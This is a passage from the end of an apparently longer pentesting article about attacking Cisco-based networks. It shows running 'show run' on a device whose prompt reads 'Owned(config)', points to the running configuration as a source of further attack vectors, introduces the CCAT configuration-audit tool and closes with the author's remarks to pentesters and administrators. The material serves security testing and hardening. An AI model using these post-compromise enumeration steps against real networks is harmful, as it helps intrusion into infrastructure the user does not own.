You can use the show run command to find out which configuration is currently running. This reveals some peculiarities of the infrastructure. Perhaps this information will lead you to an easier “win” during a pentest. For example, suddenly you discover the use of a AAA server, which gives you another vector of attack.

Owned(config)# show run

9.4.1 CCAT

CCAT (Cisco Config Analysis Tool) is a special tool designed to analyze Cisco hardware configuration files for security holes. It helps automate the process of finding security misconfigurations and is useful to pentestors and network administrators alike.

~/ccat$ python3 ccat.py showrunfromsw1.txt

Outro

These are the kinds of nightmares that can arise in networks that use Cisco equipment if they are administered by short-sighted network engineers. I spent a month and a half on this research and was surprised at how many vectors there are when attacking Cisco-based networks. I very much hope that my research will give pentesters new attack vectors, and that network administrators will think about the security of their networks and take action.